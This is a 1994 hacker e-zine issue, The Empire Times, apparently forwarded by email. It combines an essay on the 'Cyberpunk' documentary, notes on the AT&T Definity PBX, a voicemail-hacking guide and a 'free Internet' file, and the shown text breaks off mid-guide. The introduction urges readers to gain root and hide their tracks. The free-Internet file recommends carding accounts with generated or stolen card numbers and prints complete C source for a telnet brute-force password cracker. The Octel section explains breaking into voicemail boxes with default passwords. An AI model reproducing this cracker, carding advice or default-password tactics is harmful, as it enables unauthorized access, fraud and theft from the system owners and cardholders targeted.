From armitage@dhp.com Sun Sep 25 19:26:49 1994 Date: Sun, 25 Sep 1994 15:48:19 -0400 From: armitage@dhp.com To: dtangent@fc.net %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % T H E E M P I R E T I M E S % % ------------------------------- % % The True Hacker Magazine % % % % September 13th, 1994 Issue 4 % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% This Issues Features: # Selection Author Size - --------------------------- --------- ---- X. Introduction albatross 3k 1. The Cyber-punk Image firefly 7k 2. AT&T Definity System 75/85 erudite 15k 3. How to get free Internet Pud C0ur13r 14k 4. The Octel VMB System da telcopimp 20k 5. My Life as a Narc... noelle 10k 6. Hacking Simplex Locks erudite 3k 7. SS7 / Caller ID Discussion grendal 6k 8. Don't Tell us Our Name erudite 3k ------------------------------------------------------------------------------ Founder: Albatross Organizer: Armitage Contributors: Da Telcopimp, Erudite, Firefly, Grendal, Noelle, PuD Courier. Special Thanks: AT&T, Sevenup. =========================================================================== -=- The Empire Times -=- Introduction Yes it is true. The Empire Times is back online and ready for a little rok -n- roll. The plan is to bring back what appears to be lost from the underground world. The Times will go into details on topics of Cellular fone phreaking to the personal lives of those hackers which we all know and love. I believe this issue will spark the intrest of those who have become cyber-potatoes and those who have yet to realize what a UNIX system is all about. It is time for the Hacker Klan to unite and share information so that we can expand our realm of control over the growing InterNet which we love so much. Just think how much money is spent to keep us out of systems which (as we all know) never works. I have always believed that if there is a way for a regular user to access a system, then there is a way in. Always use your brain as to the capablities of the agencies which are our to stop us, such as the FBI, S.S., and the Military. When obtaining 'root' at sites, always remember to hide your tracks into the system. Check for log files, see what wrappers and possible cron jobs which might be running to catch you. Those who prevail shall always be known as 'Elite'. Those who fail just didn't learn the tricks of the trade fast enough. Just remeber that we are building a MAFIA on the InterNet, if you want it to succeed, then YOU know what has to be done. So keep your minds growing and those electrons flowing. Last words ========== To the Virginia Crue: If the South is to rise again, Ya'll are the ones that'll do it. To the Maryland Crue: We have more Net access than any state. Make sure that ya'll keep it like that. Smoke it like a NeckBone. To the D.C. Crue: I've never see so many hacked outdials and PBX's. Keep it that way. Don't 4 get your 9mm. "I'm only trying to build an Empire." -Alby ============================================================================== -=- The Empire Times -=- Volume 2, Issue 4, File 1 of 8 The Cyberpunk Image by firefly There's a new flick that they are showing at schools in the area this year. It's one of those documentaries that is produced exclusively for educators that targets a certain culture and proceeds to slander against it. "Cyberpunk" is such a movie. I had the unfortunate luck to sit through it in a general education program in college last semester. That was bad enough ...but then I had to show it to a class this summer and then spark discussion about it when I disagreed with the entire theme of the movie! The movie "Cyberpunk" was a documentary that showed the use of computers and continued the media's hype of the so-called "cyberculture". The film was well-done, and well-organized, but I disagree with what I consider are the film's themes about the "computer generation" (a.k.a.: cyber-punks). Not to mention the fact it was written entirely in "computer-esque" with techno music, rapid-picture imagery, and other "information age" fads. This paper will discuss the term "cyberpunk" itself, offer observations about this culture, and conclude with the true nature of the computer generation. The term cyberpunk, coined by William Gibson in his Neuromancer book, is a literary and now, thanks to the media, an overused term used to describe every type of "console cowboy" from a computer programmer to a malicious electronic explorer, to someone who sees a Gibson-esque future run by computers, to someone who dresses in leather, and carries a digital pager. The term "punk" usually refers to someone against the current cultural norms of society. The so-called cyberpunks are considered the small segment of society that is against the current norms of "regular people". Well, the truth of the matter is that these "cyber-dudes" have grown up around computers, digital games, and electronic tools in the classroom and workplace. Is it their fault that computers have simplified many redundant tasks in society? Is it these people's fault that computers now help fly aircraft, make cars, improve international communication? NO! This computer generation is simply the first generation to pioneer such a radically new concept of existence. While our forefathers saw things in a linear perspective, we see them in a virtual reality that can be changed into a nonlinear environment depending on our virtual vantage point. Timothy Leary would say this is "consciousness-expansion". Consider your parents and the advent of television or the superhighway across your home state. Your parents saw it as revolutionary, and possibly frightening that automobiles could "drive" in 6-8 lanes of 55mph traffic across the nation. They probably saw the political and Orwellian problems with having a video receiver in their living rooms that could broadcast political messages. But they adapted and grew up with it, while their parents looked on in amazement. The same holds true with the electronic age. My generation grew up with Atari, Apple, Windows, and modems. We are used to "driving" with multiple pathways simultaneously -- parallel processing -- our lives, and utilizing the vast speed that information or data takes these days to further advance ourselves. This illustrates how those in power of any sort -- political, literary, media, business -- see this generation, as a band of people who use strange things to live their lives. Well, the television was strange to my grandmother, but she adapted -- as my mother grew up with it --, and so will this generation of leaders adapt as our generation of people grow up with computers. The difference with this computer generation is that we deal with so much information at such a rapid pace, that those who look on us (ie, policymakers and journalists) cannot keep up with it...hence the fear of what they don't know. "Cyberpunk" sounds evil. The unknown is evil. Therefore, since nobody understands the cyber-culture, those that do are therefore evil. Simple societal algebra. The movie is full of stereotypes. Firstly, there is no cyberpunk standard for music. People think techno is the music of the computer age because it is fast and computer-generated. False. Granted, many people who like techno like computers, but a history book of 2020 should not show the 1990s' cyber-culture liking techno in the same way as 18th century victorians enjoyed the waltz. Outstanding on-line magazine UXU-148 Technophilia mentions that the cyber-culture likes any form of music, and not only computer-generated tunes. I associate with hackers, and people the media calls "cyberpunks". Our music ranges from hard rock and metal to movie soundtracks to top forty to reggae, and some techno. Yet, throughout the movie, viewers are led to believe that fast techno is the "music of the cyberpeople." Granted, a "rave" is an all-night computer-controlled techno event is the climactic part of being a part of a cyberculture, but not symbolic of the entire culture of computer-users. There was "lotsa leather". Again, another stereotype. True, the classic street punk wore combat boots and a leather jacket, but to imply that this is how an entire subculture dresses is absurd! To dispel this myth, and meet the movie on its own level of stereotyping, go to any rave, which many consider the climactic event in the cyberculture. The fashion ranges from the sublime to the ridiculous, from exotic to erotic, from jeans and T-shirts to leather and handcuffs. Mostly people dress the way they go to a dance club. The people they interviewed in the movie were interviewed at a convention, or another public place, where they are dressing to make an impression. Just because someone wears leather at a convention or on a documentary tape does not mean he/she represents the entire culture being profiled, or that the person dresses like that regularly. I know of very few hard-core cyber-kids who dress that way. I frequently wear shorts, jeans, t-shirts and turtlenecks. Part of my accessories is a pager and ATM card. Gee. According to Cyberpunk, I cannot be a member of the cyberculture, since I don't own a leather jacket or have long hair. Enough ranting. I've got better things to do. But I just thought it interesting that this flick is shown as an (and meant to be an) " objective educational tool" to college students to show them about computers and society, but portrays them as evil, conniving thugs. Votes on next topic: Business Intelligence? or Social Engineering? ============================================================================== -=- The Empire Times -=- Volume 2, Issue 4, File 2 of 8 AT&T Definity System 75/85 by erudite ================================ AT&T Definity System 75/85 Communications System Description & Configuration ================================ ===== Intro ===== Let me introduce you to the AT&T Definity System 75/85. This communications system is a product of the merging of the AT&T System 75 and System 85 architectures. The name Definity came from the two words "definitive" and "infinity". Let me also tell you that there are many different communications systems out there. (Merlins, AT&Ts) Many many many, I couldnt name them all, but the AT&T systems are nice. I enjoy working with them, and I hope you enjoy this text file. This System is an advanced business communications system. A Digital Communications Protocol (DCP) allows data communication through data terminal equipment connected to the digital switch. This allows the system to handle data and voice communications simultaneously. The System can handle up to 1600 lines that supports all digital, hybrid, and analog terminals and equipment. Up to 400 trunks, and up to 400 Automatic Call Distribution (ACD) Agents. The Data switching capacity is up to 800 digital data endpointsþ, and 160 integrated and combined pooled modem facilities. þ Digital Data Endpoints include the following: þ 510D Personal Terminal or 515-Type Business Communications Terminal þ 7404D Terminals þ 7406D or 7407D Equipped with optional Data Module Base þ Asynchronous Data Units (ADU) (DCE type device that has rs232c interface) þ Digital Terminal Data Modules þ 3270 Data Modules þ Internal Data Channels þ Trunk Data Modules (Modular) þ Processor Data Modules (Modular) ========== Networking ========== The Processor Port Network (PPN) always provides the switch processing element (SPE) and port circuits. An Expansion Port Network (EPN) is available to increase line size of any system by allowing you to add additionnal port circuits. The EPN connects to the PPN over a fiber optic cable that may be up to 1.86 miles remotely situated. It may also by located adjacent to the PPN. This System may be arranged stand-alone or you can integrate it into a private network. You can form these types of Networks: þ Tandem Tie Trunk Network (TTTN) þ Electronic Tandem Network (ETN) þ Main/Satellite Configuration þ Distributed Communications System (DCS) þ Centralized Attendant Service (CAS) An Integrated Services Digital Network Primary Rate Interface (ISDN-PRI) makes it possible for the Definity System to access various private and public network services. With ISDN-PRI the you can access these services: þ Call by Call Service Selection þ Private Network Services þ Information Forwarding þ Call Identification Display - Connected Number Display - Connected Party Name Display - Calling and Called Number Record Display - Calling and Called Party Name Display ============= Configuration ============= The Actual System is encased in a pair of "cabinets" which have a fiber optic link between them. It is also common to have a stack of about three "cabinets" of a smaller size, for different models. Shown here is a typical multi-carrier system with a Processor Port Network (PPN) cabinet and Expansion Port Network (EPN) cabinet. attendant outside trunks _____ outside private line consoles and lines / data transmission equipment or \ \ / analog switched network \ fiber optic | | | connetion | | __ business communication -+---------/~\--------+--+ / terminals | AT&T | | AT&T | | | DEFINITY | | DEFINITY +------' ___data ---+ SYSTEM | | SYSTEM +--------<>------[audix] / terminals / | 75/85 | | 75/85 | modular data / | |___________| |__________+| processor ____ | manager | | | | +'optional host terminal | | +-------<>----------+ | computer or call / +-------[]-----+, |____| management system / asynchronous | single line data unit \__ data voice terminals terminals =================== Voice and Data Management Features =================== There are alot of voice features and services, in fact, too many to list, I will do a run down on all the interesting and useful features and services. It has many Voice Management, Data Management, Network Services, System Management, Hospitality Services, and Call Management Services. þ Attendant Display: Contains useful call related information that the call attendant can use to operate the console more efficiently þ Audio Information Exchange Interface (AUDIX): This interface allows both inside system users and remote callers to edit, recieve, send, write, and forward voice messages. þ Authorization Codes: A means to control user privileges throughout the system. þ Automatic Incoming Call Display: Shows identity of remote caller and relays it to the display console. þ Class of Restriction: Defines up to 64 classes of user restriction. þ Conference Service - Attendant Conference: Allows Attendant to construct a conference call - Terminal Confernce: Allows remote user to construct a conference call without attendant assistance. þ Data Privacy: This, when activated by user, protects analog data calls from being interrupted by any of the systems overriding features, and denies ability to gain access to, and or superimpose tones. þ Data Restriction: This feature is the same as Data Privacy, except that it is issued by the administrator to a certain extension # for indication of a dedicated private data extension. þ DCS Call Forwarding All Calls: This is the voice forwarding service. þ DCS Distinctive Ringing: This is simply a distinctive ringing feature. þ Dial Access: This is simply the package of features that allows anyone in the system to dial anyone else, such as the attendant console. þ DS1 Tie Trunk Service: This service provides a digital interface for the following trunks and more. þ Voice Grade DS1 Tie Trunks þ Alternative Voice/Data (AVD) DS1 Tie Trunks þ Digital Multiplexed Interface (DMI) Tie Trunks þ Central Office (CO) Trunks þ ISDN-PRI Trunks þ Remote Access Trunks þ Wide Area Telecommunications Service (WATS) Trunks þ Facility Test Calls: Provides voice terminal user who is capable of all features and functions that is used for maintenance testing. Such as access to system tones, access to specific trunks, etc. Note: AT&T designed the Facility Test Calls Feature for testing purposes only, and system maintenance. When properly administered, AT&T claims that the customer is responsible for all security items, and secure system from unauthorized users, and that all users should be aware of handling access codes. AT&T claims they will take no responsibility for poor administration. þ Hunting: The internal hunting feature is very nice, as you probably know, it rings down if busy, or if it recieves a dial timeout. þ Information System Network Interface (ISN): AT&T ISN is a packet switched local area network that will link with mainframes, workstations, personal computers, printers, terminals, storage devices, and communication devices. þ Integrated Services Digital Network Primary Rate Interface (ISDN-PRI): This interface allows connection of the system to an ISDN Network by means of ISDN frame format called PRI. þ Inter-PBX Attendant Calls: Positions for more than one branch, and each branch has a Listed Directory Number (LDN). þ Modem Pooling: Switches connections of digital data endpoints. þ Network Access (Private): Connect to the following Networks þ Common Control Switching Arrangement (CCSA) þ Electronic Tandem Network (ETN) þ Enhanced Private Switched Communications Service (EPSCS) þ Tandem Tie Trunk Network (TTTN) þ Software Defined Network (SDN) þ Network Access (Public): Access to public networks. þ Privacy: Protects from others bridging into their extensions. þ Remote Access: This lets you access the system remotely, again, AT&T doesnt want to take responsibility for anything that is abused with this feature. þ Restrictions: There is a large list of restriction features that I'm sure would come in handy. þ Service Observing: Allows high access users to monitor others calls, again, AT&T does not want to take any legal fees on missuse on this feature. þ Transfers: Allows any user to do an attendant call transfer without an attendant's assistance. ======== Software ======== The System comes with swithced services software, administrative software, and maintenance software. All running on a real-time operating system. þ Switched Services Software: This Software provides all the calling features and services. This also is responsible for relaying any information to the console display. þ Administrative Software: This Software is needed to run administrative tasks, and configurations. þ Maintenance Software: The Maintenance Software is used to keep everything running properly. ===================== System Administration ===================== The "Access Code" you will encounter on these systems is a 1, 2, or 3 digit number. The pound (#) and star (*) keys can be used as the first digit of the code. Below you will see a typical Screen Format taken from one of my logs, information aside you can see what the administration Screens look and feel like. -------------------------------------------------------------------- Page 1 of 4 STATION Extension: ____ Type: _____ Lock Messages: _ COR: _ Room: _____ Port: ___________ Security Code: ____ COS: _ Jack: _____ Name: ___________ Coverage Path: ___ Cable: _____ FEATURE OPTIONS LWC Reception? _____ Headset? _ Coverage Msg Retrieval? _ LWC Activation? _ Auto Answer? _ Data Restriction? _ Redirect Notification? _ Idle Appearance Preferences? _ PCOL/TEG Call Alerting? _ Data Module? _ Restrict Last Appearance? _ Display? _ ABREVIATED DIALINGS List1: _____ List2: _____ List3: _____ BUTTON ASSIGNMENTS 1: _______ 6: _______ 2: _______ 7: _______ 3: _______ 8: _______ 4: _______ 9: _______ 5: _______ ------------------------------------------------------------------- ================== System Maintenance ================== Finally the Maintenance section, where you can see where the errors are logged, where all the alarms are sent, printed, etc. There are 3 different types of alarms: þ Major Alarms (Critical Damage, requires immediate attention) þ Minor Alarms (Errors, still operable, requires action) þ Warning Alarms (no noticeable degradation of service, not reported to console or INADS) The Error log is reported and can be viewed at The Manager Terminal, as well as the alarm log. ============== Basic Acronyms ============== ADU Asynchronous Data Unit AUDIX Audio Information Exchange COR Class of Restriction COS Class of Service DCP Digital Communications Protocal DMI Digital Multiplexed Interface EPN Expansion Port Network ISDN Integrated Service Digital Network PPN Processor Post Network PSDN Packet Switching Data Network ===== Tones ===== Here is most of the Tones, mostly either interesting ones or oftenly used tones the System. Here are the tones, the frequencies, and the moderations. Tone Frequency Pattern ---- --------- ------- Answer Back 3 2225 Hz 3000 on Answer Back 5 2225 Hz 5000 on Bridging Warning 440 Hz 1750 on, 12000 off, 650 on; repeated Busy 480 Hz + 620 Hz 500 on, 500 off; repeated Call Waiting Internal 440 Hz 200 on External 440 Hz 200 on, 200 off Attendant 440 Hz 200 on, 200 off Priority Call 440 Hz 200 on, 200 off, 200 on, 200 off, 200 on Call Waiting Ring Back 440 Hz + 480 Hz; 900 on (440 + 480) 440 Hz 200 on (440) 2900 off; repeated Cnrt Att Call Incoming Call Indentification 480 Hz & 440 Hz 100 on (480), 100 on (440), & 480 Hz 100 on silence; Dial Zero, Attendant Transfer, Test Calls, 440 Hz 100 on, 100 off, 100 on Coverage 440 Hz 600 on Confirmation 350 Hz + 400 Hz 100 on, 100 off, 100 on, 100 off, 100 on Dial 250 Hz + 400 Hz Continuous Executive Override 440 Hz 300 on followed by Intercept 440 Hz & 620 Hz 250 on (440), 250 on (620); repeated Ringback 440 Hz + 480 Hz 1000 on, 3000 off; repeated Zip 480 500 on ===== Outro ===== þ This file was based on the statistics for the AT&T Definity System 75/85 (multi-carrier cabinet model) communications system. I hope you learned something, anywayz, questions comments, system login information, defaults, where to get manuals, or anything else. email me (armitage@dhp.com) and I will get back to you. erudite (armitage on irc) ============================================================================== -=- The Empire Times -=- Volume 2, Issue 4, File 3 of 8 How to Get a Free Internet Account by PuD C0ur13r I know the story. Your just starting out, and you don't have an internet account. And you don't want to pay for one, right? Well, here are some tips to getting free internet. Freenets ---------------- Oh bleh, you say. A freenet?!?!@#$ Well, yes, a freenet. Why not? You get a mailing address, a gopher, maybe usenet, maybe irc, maybe some other added features. Heck, on some freenets you get a shell account. But even if you don't get a shell account, there are many ways to get something of a shell. Vi, Veronica, gopher, and many other useful little bugs. This article is not for telling how to get shell on a freenet, because that would take up another article. But here are some freenets: telnet to: leo.nmc.edu login: visitor yfn.ysu.edu login: visitor freenet.scri.fsu.edu login: visitor freenet.carleton.edu login: guest freenet.victoria.bc.ca login: guest freenet.lorain.oberlin.edu login: guest freenet.hsc.colorado.edu login: guest bigcat.missouri.edu login: guest garbo.uwasa.fi login: guest ids.net login: guest bbs.augsburg.edu login: guest tpe.ncm.com login: guest michael.ai.mit.edu login: guest bbs.isca.uiowa.edu login: guest/new phred.pc.cc.cmu.edu 8888 login: guest/new muselab.ac.runet.edu login: bbs (send mail to 'gabe' to access irc) netaxs.com login: bbs shadow.acc.iit.edu login: bbs bbs.augsburg.edu login: bbs utbbs.civ.utwente.nl login: bbs oscar.bbb.no login: bbs bugs.mty.itesm.mx login: bbs tudrwa.tudelft.nl login: bbs ara.kaist.ac.kr login: bbs cc.nsysu.edu.tw login: bbs cissun11.cis.nctu.edu.tw login: bbs badboy.aue.com login: bbs tiny.computing.csbsju.edu login: bbs Quartz.rutgers.edu login: bbs bbs.fdu.edu login: bbs paladine.hacks.arizona.edu login: bbs freedom.nmsu.edu login: bbs kids.kotel.co.kr login: bbs wariat.org login: bbs seabass.st.usm.edu login: bbs pass: bbs heartland.bradley.edu login: bbguest freenet-in-a.cwru.edu login: oubbs.telecom.uoknor.edu login: chop.isca.uiowa.edu login: pc2.pc.maricopa.edu 4228 login: af.itd.com 9999 login: hpx6.aid.no login: skynet launchpad.unc.edu login: launch atl.calstate.edu login: apa forest.unomaha.edu login: ef cue.bc.ca login: cosy softwords.bc.ca login: cosy vtcosy.cns.vt.edu login: cosyreg Nebbs.nersc.gov login: new Milo.ndsu.nodak.edu login: new pass: new tolsun.oulu.fi login: box mono.city.ac.uk login: mono pass: mono newton.dep.anl.gov login: cocotext kometh.ethz.ch answer at prompts: # call c600 TERMSERV call avalon login: bbs Va Pen or School Internet ---------------------------- I know that in Virginia, there is a semi-internet provider called Va Pen. I call it semi, because only teachers usually get a shell account. And the account will only last for a year, so then you have to subscribe for the account again. Also, your school might have some kind of internet feed. Try hooking up with that in any way possible. Card an Account ------------------- There isn't much to be said on this. For Delphi, all you usually need is a Credit Card Number Generator of some sort. The account will probably only last about a day, but you can do it as many times as you want. If you have a real CC number, with real name and address, then you will have a semi-legit account, but that will probably only last untill that person your carding gets his or her bill. :-) Experiment. Call up your local provider, and try carding it. Chances are, it will work. Decservers ----------------- Some decservers are hooked up to the internet. The only way you can find them is to scan for them. When you do find a decserver or two, do 'show services' command. If you see anything that is remotely related to 'telnet' or 'rlogin' then play around with it. You might be able to telnet to a site on the internet. 1800 Internet ----------------- There are two kinds of 1800 Internet. One is a 1800 number that is kind of like a decserver, except its not. It lets you telnet like a decserver though, but it only lets you use IP numbers. I have only played around with a very few of these "decservers", because 1800 have ANI. And this kind of telnet gets used to hell, so it doesn't last very long. One person I knew got called by the authorities for using a 1800 "decserver". But its not really illegal to use, because you didn't have to hack it, or login into it. Its just there. But I wouldn't take that legal advice to heart, though. Another kind of 1800 Internet is where you can call up a unix and get an account through the 1800 number. Delphi has this, as does IIA.org. Cyberspace.net's number used to be 1800-833-6378, but I hear that it is down. A Plain Hacking Good Time. ------------------------------ Brute it away baby. You could also take that delphi account you just carded, finger a site, and brute it that away. Bruting works about 2% of the time now, but this script will brute for you. /* ###################################### # Unix telneting brute force hacker # ###################################### */ #include #include #include /* ######################################## # Set this according to the path and # # filename where telnet is located # ######################################## */ #define TELNETPATH "/usr/ucb/telnet" /* ############################################################## # The Following are set to default on a SunOs login format. # # You may need to change these for other systems. # ############################################################## */ #define LOGINSTRING "login:" #define PASSSTRING "Password:" #define GOTONESTRING "Last login" /* ###################################################### # You won't need to edit anything after this point # ###################################################### */ #define GETC(c) read(readfd,&(c),1) /* Functions to read and write pipe */ #define PUTC(c) write(writefd,&(c),1) #define PUTS(s) write(writefd,(s),strlen(s)) char *HOST[80]; /* String: Holds connect to host on telnet */ char DBUG = 0; /* Switch: for Debug/Background modes */ char EOO = 0; /* Switch: Exit after 1st find */ char *afilename[80]; /* String: filename to account list */ char *pfilename[80]; /* String: Holds filename to password list */ char *ofilename[80]; /* String: Holds filename to output file */ char account[10]; /* Strings: Hold account/pw for attempts */ char password[10]; FILE *accounts; /* File pointers */ FILE *passwords; FILE *found; char ch; /* General purpose */ char buf[800]; int count; int p1[2], p2[2]; /* Streams for the process pipe connection */ int writefd, readfd; /* Handles for the pipe */ /* ############################################################################### # Handles the death of the telnet process due to a timeout on connection. # # Restarts a telnet process and reconnects to the host # ############################################################################### */ void *death() { if (1 == 1) { wait3(NULL, WNOHANG, NULL); signal(SIGCLD, death); switch (fork()) { case 0: dup2(p2[0], 0); dup2(p1[1], 1); execl(TELNETPATH, "telnet", 0); printf("Exec Failed\n"); default: PUTS(HOST); return; } } wait3(NULL, WNOHANG, NULL); signal(SIGCLD, death); return; } /* ########################### # Error exit routine/Help # ########################### */ void help(parg) { printf("\nUsage: %s
-a -p -o\n", parg); printf("Flags: -d (Debug/Run in foreground)\n"); printf(" -1 Exit after first find\n\n"); exit(); } /* ######## # MAIN # ######## */ main(argc, argv) int argc; char **argv; { if (argc == 1) help(argv[0]); strcpy(HOST, argv[1]); for (count = 2; count != argc; count++) { if (argv[count][0] != '-') { printf("\n:: Invalid Command Line ::\n"); help(argv[0]); } ch = argv[count][1]; switch (ch) { case 'a': if (!afilename[0]) strcpy(afilename, argv[count] + 2); break; case 'p': if (!pfilename[0]) strcpy(pfilename, argv[count] + 2); break; case 'o': if (!ofilename[0]) strcpy(ofilename, argv[count] + 2); break; case 'd': DBUG = 1; break; case '1': EOO = 1; break; default: printf("\n:: -%c: Unknown option ::\n\n", ch); help(argv[0]); } } while (!afilename[0]) { printf("AccountList: "); gets(afilename); } while (!pfilename[0]) { printf("PasswrdList: "); gets(pfilename); } while (!ofilename[0]) { printf("Outfile: "); gets(ofilename); } printf("\nHOST: %s", HOST); printf("\nAccountFile: %s", afilename); printf("\nPasswrdFile: %s", pfilename); printf("\nOutfile: %s", ofilename); printf("\nDebug: "); if (DBUG == 0) printf("Off"); else printf("On"); printf("\n"); strcpy(buf, HOST); strcpy(HOST, "open "); strcat(HOST, buf); strcat(HOST, "\n"); printf(HOST); if (DBUG == 0) { if (fork()) { printf("\nRunning in the background. "); exit(); } printf("PID: %d\n", getpid()); } signal(SIGCLD, death); /* Execute death function when child dies */ /* ####################################### # Set up pipes and start telnet child # ####################################### */ if (pipe(p2) == -1 || pipe(p1) == -1) { printf("Error making pipes.=n"); return; } readfd = p1[0]; /* read from p1 */ writefd = p2[1]; /* write to p2 */ switch (fork()) { case -1 : printf("Couldnt fork off a child\n"); return; case 0 : /* the child */ dup2(p2[0], 0); /* read from p2 */ dup2(p1[1], 1); /* write to p1 */ execl(TELNETPATH, "telnet", 0); printf("Exec failed.\n"); exit(-1); default: /* parent */ break; } /* ############## # Open files # ############## */ if ((accounts = fopen(afilename, "r")) == NULL) { printf("ERROR: AccountFile <%s> Not found.\n", afilename); exit(); } if ((passwords = fopen(pfilename, "r")) == NULL) { printf("ERROR: PasswrdFile <%s> Not Found.\n", pfilename); exit(); } found = fopen(ofilename, "w+"); fprintf(found, "Trying Host: %s\n\n", buf); fflush(found); PUTS(HOST); /* Send open to telnet */ while (1) { /* Loop to capture to buf */ if (GETC(ch) > 0) { if (DBUG == 1) putchar(ch); buf[count++] = ch; } if (ch == 10) count = 0; if (strstr(buf, GOTONESTRING) != NULL) { /* Check for good account */ count = 0; fprintf(found, "Account: %sPassword: %s\n", account, password); fflush(found); printf("Got one! Account: %sPassword:%s\n", account, password); if (EOO == 1) exit(); } if (strstr(buf, LOGINSTRING) != NULL) { /* Check for login prompt */ count = 0; strcpy(buf, "XXXXXXXX"); if (ftell(passwords) == 0) { if (fscanf(accounts, "%s", account) == EOF) { printf("End of accounts\n"); break; } strcat(account, "\n"); } if (DBUG == 1) puts(account); PUTS(account); } if (strstr(buf, PASSSTRING) != NULL) { /* Check for passwd prompt */ count = 0; strcpy(buf, "XXXXXX"); if (fscanf(passwords, "%s", password) == EOF) { strcpy(password, account); rewind(passwords); } else strcat(password, "\n"); if (DBUG == 1) puts(password); PUTS(password); } } } Sites That give you shell accounts for free. ----------------------------------------------- These are the only ones I know of offhand that you can telnet to and get free accounts. axposf.pa.dec.com login: axpguest pass: cyberspace.org cyberspace.net cyberspace.com cybernet.cse.fau.edu (not shell, but has alot of other nice things.) cris.com delphi.com (well, you know, that 5 hours of free internet deal.) nyx.cs.du.edu login: new hermes.merit.edu login: um-m-net m-net.ann-arbor.mi.us login: newuser If anyone wants to update, or make this t-phile more informational than it already is, email roach@tmok.res.wpi.edu. ============================================================================== -=- The Empire Times -=- Volume 2, Issue 4, File 4 of 8 The Octel VMB System by Da TelcoPimp ++-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-++ || || || /--------/ /--------/ /-------------/ /----------/ /-/ || || / /----/ / / /---/ / /-----+ +-----/ / /----/___/ / / || || / / / / / / /__/ / / / +---/ / / || || / / / / / / / / / +---/ / / || || / /____/ / / /___/---/ / / / /____/---/ / /____/---/ || || /________/ /_________/ /_/ /__________/ /__________/ || || || || k|LLa ak-aSKi by Shadowdancer da TelC()PiMP || ++-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-++ Octel is a type of VMB system, like Meridian Mail or Audix or whatever. But Octel is not well known and I have recently been abusing these systems in my area. There is one thing that I have noticed about these systems, they have very good security. All this inpho was gotten from Octel Voice Information Processing manual Release 3.0, a woman who works for Northern Telecom and playing around on systems. So let this voyage into the world of the Octel VMB system begin. Ignore all spelling errors, I cant spel worth shit. Format for this file is: each section that begins with the # symbol means that that is one of the options from the Main menu, and everything under that will take you down levels.. Dialups: ======== There are two dialups for this system. There is the backdoor, the Octel System number, and then there is the front door. The Backdoor can be used to leave messages and also login to the vmb. This also goes for the front door as well. The differnece between the front door and the backdoor is the greeting. The front door is where you get the personalized greeting. The backdoor will pick up and say something to the effect of enter the mailbox number you wish to leave a message to or press # to indicate that you have a mailbox on this system. Hacking: ======== There is really not much to this part. I have encountered an octel system backdoor where the box number was the same as the password. I have also encountered a system where the password was the whole telephone number plus a 1 before it such as the box number was 1234 and the password was 1(pre)1234. These are all just basic defaults but they are what I have encountered more frequently. What to do after Logging in: ============================ After you have logged in, before you are brought up to the main menu, you may be given some messages about different things maybe a broadcast message from your sysadmin or notification of automatically deleted messages etc. Here is a list of options you can use at the main menu: #1. Message Review ------------------ 11: To hear new messages. This option plays all new messages since the last session. 1: To review all messages. This allows you to play all messages in your mailbox, in the order recieved. 4: Replay. After listening to a message you are able to hit 4 and replay that last message. Commands used during playback will be listed at the end of this section. 5: Get Envelope information. Envelope iformation basically gives you the specs on a message. It will tell you whether it came from someone who has a mailbox on that system or whether it came from and outside caller. It will tell you the date & time sent, how long it is and if the message is marked as private, urgent or both. 6: Send a copy. Press 6 and then you will be prompted to make a recording of comments for the message so that the person the message is being forwarded to knows that it is a forwarded message from you. After recording the comments press #. If you would like to review your comments press 1. Now you enter the mailbox or if you don't know that press # to dial by name. 7: Erase. Just what it says. It erases the message after you listen to the message. 8: Reply. After you press 8 record your reply and then press # to tell the system you are done recording and then press # again to send. You can use record/edit controls during your reply. These will be covered later in the text. 9: Save. Just as it says. This option archives your messages. #: Skip a message. While you are listening to the new messages you can press # to skip them but after you listen to the new messages it plays your skipped messages over and then your archived messages. ##: Skip to archived messages. If you are listening to the new messages and you want to skip to the archived messages just hit ## and you will be taken to them. *: Cancel review of messages. This option cancels message review and takes you back to the main menu. Commands used during playback of messages ----------------------------------------- 1: Rewinds message 10 seconds. 11: Rewinds to the begining of the message. 2: Pause. To unpause press 2 again. 3: Fast-forwards message 10 seconds. 33: Fast-forwards to the end of the message. 4: Plays the message slower. 5: Gives envelope information. 6: Plays the message faster. 8: Levels volume to normal level. 9: Increases volume. #2. Sending messages to other subscribers on the system ------------------------------------------------------- This function of the vmb is quite useful to the actual users of the system. Once someone has recieved there messages and read them etc. They can then send a message to someother person on that same system without having to dial their front door. Here are the options that are used during the recording and after the recording of the message. #: Stop recording once you are satisfied with the message. 1: Replay your message. *: Re-record your message if you are not satisfied with it. When re-recording you can re-record the whole message or just part of it. Use the Recording controls which will be listed later on in the text. (NOTE If you are leaving a long message the system notify you with two beeps that tell you your time is almost up.) Once you have finished recording your message you have the choice of re-recording the message or delivering it. There are several ways of selecting a destination. 1) box number. 2) subscribers name. 3) group or personal distrubution list. 4) a guest or home mailbox number. (NOTE Later on in the text we will discuss how to create distribution lists and guest and home mailboxes.) When you are going to give the name of the person, instead of the mailbox number, here is the format for entering in the name -- last, first. 0=0 1=1 2=2,a,b, or c 3=3,d,e, or f 4=4,g,h, or i 5=5,j,k, or l 6=6,m,n, or o 7=7,p,q,r, or s 8=8,t,u, or v 9=9,w,x,y, or z For instance, I was on the same system as you, you could send it to PiMP,Telco = 746783526 You can mark the messages as either urgentor private. After you enter the destination and before you send the message is when you can mark the message. You can always cancel the the option by pressing the option number a second time. 1: Private. 2: Urgent. If you select message conformation you will presented with two choices. conformation of receipt and notification of non-receipt. Conformation of receipt is a system generated message which is sent to you after the person has read your message. Notification of non-receipt is a system generated message that tells you that the subscriber has not listened to your message within a certain time frame. 1: Conformation of receipt. 2: Notification of non-receipt. If you wanted to you could give the system a certain time to deliver the message. This function is known as Future Delivery. 4: Future delivery. After selecting this option you will be prompted to enter a date. You can either enter the actual date or if the message is to be delivered within the week you can specify the day of the week. 1: Specify the date. -Select the month. Jan.= 1 and Sept.= 9. -Select the date. Between 1 and 31. -Set the hour and minutes. 7:00 = 700 and 12:30 = 1230. -Select 1 for a.m. or 2 for p.m. 2: Specify the day of the week. -Enter the first two letter of the day, using the chart above that was used to enter in the name of the person on the system. Sun.= 78 and Fri.= 37. -Select the 